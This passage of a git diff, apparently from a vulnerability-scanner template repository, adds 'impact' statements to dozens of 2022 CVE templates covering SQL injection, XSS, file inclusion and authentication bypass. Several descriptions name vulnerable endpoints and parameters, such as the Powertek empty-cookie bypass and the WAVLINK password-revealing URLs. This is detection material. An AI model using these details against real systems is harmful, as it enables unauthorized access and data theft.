Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index 86c7ce3dcc..b20eda9e85 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-31980.yaml b/http/cves/2022/CVE-2022-31980.yaml index c3027d5dcd..fb7e40f795 100644 --- a/http/cves/2022/CVE-2022-31980.yaml +++ b/http/cves/2022/CVE-2022-31980.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/manage_team&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 174daa5ef6..3954ca24e6 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=teams/view_team&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml index 9427a0d5d3..8ce7f8422f 100644 --- a/http/cves/2022/CVE-2022-31982.yaml +++ b/http/cves/2022/CVE-2022-31982.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index e4e1202502..bdf7adda82 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/manage_request&id=. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index 4f1b8b2d9e..67875120c8 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database. remediation: | To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. reference: diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index ee862428ec..72cbbb4085 100644 --- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index ef6432d2d2..0be759b84d 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=hiring&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 86d4079056..d043cbd630 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index 75dd5560fa..58b152d7d7 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /booking.php?car_id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or even complete compromise of the system. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 2a1648cb24..8582738fdd 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/view_car.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 7c8d83ff89..27d943e27d 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_booking.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Car Rental Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 83094f935a..1396baf1f9 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 7ebd9c0927..eb91ddc742 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 150fe4a483..3b1792871c 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index eb9add1445..8b0b27d3ed 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 0426048bcc..45bd896438 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device. remediation: | Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index 2c1020d733..3fbba75b34 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | u5cms version 8.3.5 contains a URL redirection vulnerability that can cause a user's browser to be redirected to another site via /loginsave.php. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Apply the latest patch or update to a version that has fixed this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index db01ef2113..a04817e379 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'toast' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 6e0be3c7dd..0e7c44d39c 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index 34a5987cdf..79c662448c 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index cc50190b75..addc16b527 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software. reference: diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 7af5c0ab0c..58f4240015 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system. remediation: | Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 84ab50d86e..20f3824983 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow impersonation by providing an arbitrary user name. An attacker can potentially reach a permission check function that will ultimately build a Unix shell command based on input and execute it, resulting in arbitrary shell command execution. Affected versions are 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by Apache Spark to fix the remote command injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 43f3120f3a..0f9544ddbd 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system. remediation: | Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later. reference: diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 26c52cdbf5..1de1a82a6e 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index f7fba31b34..df01533acd 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. It contains a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index a67b6bb4ed..bfb27eedfd 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the entire network. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 158a3a876c..b2fbef32fe 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd] and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 30f6a907ca..6c4b7aa5b1 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wavlink WN-533A8 M33A8.V5030.190716 contains a reflected cross-site scripting vulnerability via the login_page parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index 422d357e59..050f3ec75f 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wavlink WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. An attacker can download log files and configuration data via Exportlogs.sh and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings, potentially leading to further compromise of the network or device. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 5d50f2a3fa..0bc77347a4 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 is vulnerable to local file inclusion via the component /templates/default/html/windows/right.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of CuppaCMS or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index a5f21f2eff..97a1686a81 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PMB 7.3.10 contains a reflected cross-site scripting vulnerability via the id parameter in an lvl=author_see request to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of PMB. reference: diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index 8c402cd042..adfbe0d694 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to improper access control. A vulnerability in /cgi-bin/ExportAllSettings.sh allows an attacker to execute arbitrary code via a crafted POST request and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network. remediation: | Apply the latest firmware update provided by the vendor to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 8eb5c44bba..264daf6e0d 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/admin.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index 9ed2db4094..7cd43a80d6 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SpaceLogic C-Bus Home Controller through 1.31.460 is susceptible to remote command execution via improper neutralization of special elements. Remote root exploit can be enabled when the command is compromised, and an attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Upgrade SpaceLogic C-Bus Home Controller to a version higher than 1.31.460 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3484.yaml b/http/cves/2022/CVE-2022-3484.yaml index 910cc72466..8f8e836d24 100644 --- a/http/cves/2022/CVE-2022-3484.yaml +++ b/http/cves/2022/CVE-2022-3484.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress wpb-show-core plugin through TODO contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the affected WordPress website. remediation: | Update to the latest version of the WPB Show Core plugin, which includes a fix for the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3506.yaml b/http/cves/2022/CVE-2022-3506.yaml index 7ed150f35d..4b66640437 100644 --- a/http/cves/2022/CVE-2022-3506.yaml +++ b/http/cves/2022/CVE-2022-3506.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Related Posts plugin prior to 2.1.3 contains a cross-site scripting vulnerability in the rp4wp[heading_text] parameter. User input is not properly sanitized, allowing the insertion of arbitrary code that can allow an attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the WordPress Related Posts plugin (2.1.3 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index 460dcfcbe0..6f2f985d18 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement. remediation: | To mitigate this vulnerability, it is recommended to update kkFileView to the latest version or apply a patch provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index 1cd97a1d83..9c16c46895 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Zoho ManageEngine Password Manager Pro, PAM 360, and Access Manager Plus are susceptible to unauthenticated remote code execution via XML-RPC. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update provided by Zoho ManageEngine to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35413.yaml b/http/cves/2022/CVE-2022-35413.yaml index f97f03812e..7a14313ab1 100644 --- a/http/cves/2022/CVE-2022-35413.yaml +++ b/http/cves/2022/CVE-2022-35413.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall. remediation: | Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35416.yaml b/http/cves/2022/CVE-2022-35416.yaml index f05198b823..3140d08627 100644 --- a/http/cves/2022/CVE-2022-35416.yaml +++ b/http/cves/2022/CVE-2022-35416.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35493.yaml b/http/cves/2022/CVE-2022-35493.yaml index 102e3eca3f..b0d9d1437c 100644 --- a/http/cves/2022/CVE-2022-35493.yaml +++ b/http/cves/2022/CVE-2022-35493.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | eShop 3.0.4 contains a reflected cross-site scripting vulnerability in json search parse and json response in wrteam.in. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the website. remediation: | To remediate this issue, the application should implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-3578.yaml b/http/cves/2022/CVE-2022-3578.yaml index 288a7e6a0f..d37fc8f923 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress ProfileGrid plugin prior to 5.1.1 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Update WordPress ProfileGrid to version 5.1.1 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-35914.yaml b/http/cves/2022/CVE-2022-35914.yaml index df730555e2..28a35f4d4a 100644 --- a/http/cves/2022/CVE-2022-35914.yaml +++ b/http/cves/2022/CVE-2022-35914.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | GLPI through 10.0.2 is susceptible to remote command execution injection in 